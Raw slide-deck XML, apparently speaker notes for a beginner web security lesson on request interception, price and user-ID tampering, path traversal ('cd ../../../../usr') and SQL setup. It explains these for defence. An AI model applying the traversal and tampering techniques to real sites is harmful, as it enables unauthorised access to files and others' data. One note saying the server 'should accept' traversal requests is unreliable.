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y="6858000" cx="9144000"/>
  <p:notesSz cx="7010400" cy="9296400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular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Nickolas Ramo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30C1A98-9BF4-4644-A2AA-ACC82827FF89}">
  <a:tblStyle styleId="{530C1A98-9BF4-4644-A2AA-ACC82827FF8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ArialBlack-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0-24T22:10:38.448">
    <p:pos x="6000" y="0"/>
    <p:text>Add search bar w/animation!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37840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t"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970938" y="0"/>
            <a:ext cx="3037840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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701040" y="4415790"/>
            <a:ext cx="5608320" cy="4183380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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829967"/>
            <a:ext cx="3037840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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970938" y="8829967"/>
            <a:ext cx="3037840" cy="46482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curityintelligence.com/software-defenses-to-owasps-top-10-most-common-application-attack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Variable_(mathematics)" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/PHP"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90" name="Shape 9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89" name="Shape 18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98" name="Shape 198"/>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07" name="Shape 207"/>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Dynamic web pages are created on the fly based on user request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Shape 217"/>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25" name="Shape 22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33" name="Shape 233"/>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Web domain will recognize which pages you visit, and suggest content based on previous content. Use example how cookie will be used to identify user to give personalized content. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>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54" name="Shape 254"/>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63" name="Shape 263"/>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1" name="Shape 271"/>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rPr lang="en-US"/>
              <a:t>Duplicate between each section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Shape 272"/>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7" name="Shape 97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="4415790"/>
            <a:ext cx="5608320" cy="418338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98" name="Shape 98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970938" y="8829967"/>
            <a:ext cx="3037840" cy="46482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79" name="Shape 27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https://www.w3schools.com/tags/ref_httpmethods.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>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295" name="Shape 29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303" name="Shape 303"/>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latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>This will allow you to examine and modify requests before they are sent to the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Go to the ‘intercept’ tab, then mark the ‘intercept requests’ field.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 312"/>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22" name="Shape 322"/>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330" name="Shape 33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337" name="Shape 337"/>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mention that web server should check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>what went wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 35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359" name="Shape 35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11" name="Shape 111"/>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0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>URLs can contain values to determine what needs to be done. Modifying those values can result in unauthorized access to information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If I change this id to another user’s id and send it to the server, would it give me the information for another user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>look into why they do it this way?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://www.slideshare.net/ColinEnglish/web-application-security-8584955</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>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0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the first example, the web server should not have accepted $29.99 for $2999.99. It should have validated the input against certain format/rules to make sure that the parameter it received matches the intended price.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://securityintelligence.com/software-defenses-to-owasps-top-10-most-common-application-attacks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 38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0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the second example, the application should have performed an access control check to make sure that the user ID entered matches the current user. If it does not match, then the information should not be displayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mention webserver should check if this id corresponds to the logged in user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Shape 38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317500" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tweet example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>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19" name="Shape 419"/>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rPr lang="en-US"/>
              <a:t>Duplicate between each section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>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427" name="Shape 427"/>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0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/ - root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 	base of the file system where all directories (folders) and files are located. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/home - home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>contains a folder for each user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>/root - directory of the root user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 43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0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>use previous slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444"/>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53" name="Shape 453"/>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0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>add example cd ../../../../usr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Shape 461"/>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8" name="Shape 118"/>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19" name="Shape 119"/>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Shape 46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69" name="Shape 46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69850" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>webroot directory is where all the web content lives and no request should access anything beyond this directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.” - OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 47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640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A path traversal attack takes advantage of dot-dot-slash (../) to access files and folders outside of the web root folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>mention that webserver should accept this type of request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="203200">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.” - OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Shape 47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88" name="Shape 488"/>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89" name="Shape 489"/>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Shape 49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495" name="Shape 49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web server sends php code  that runs sql queries to retrieve data drom database to build a dynamc reply. and then send the response  to the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Shape 49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Shape 512"/>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indent="-317500" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>diagram of database/web server/web client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="Shape 513"/>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Shape 519"/>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520" name="Shape 520"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>create table Project(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pnumber int Primary Key,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pname varchar(30),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  plocation varchar(50)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>create table Users(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  name varchar(30),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  age int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  address varchar(50),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  salary int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pnum int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  foreign key (pnum) references Project(pnumber)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Project(pnumber, pname, plocation) values(1, "Project X", "Dallas"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Project(pnumber, pname, plocation) values(2, "Project Y", "Dallas");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Project(pnumber, pname, plocation) values(3, "Project Z", "Houston");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Project(pnumber, pname, plocation) values(4, "Middleware", "Austin");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Project(pnumber, pname, plocation) values(5, "Lazer Printers", "Dallas");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("Alice", 40, "123 Park Street", 60000, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("Bob", 25, "345 Campbell Road", 40000, 2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("Cat", 32, "567 Frankford Road", 35000, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("Joe", 50, "789 Park Street", 55000, 3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("Kathy", 66, "111 Plano Parkway", 42000, 5);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> insert into Users(name, age, address, salary, pnum) values ("George", 62, "121 Greenville Avenue", 67000, 1);</a:t>
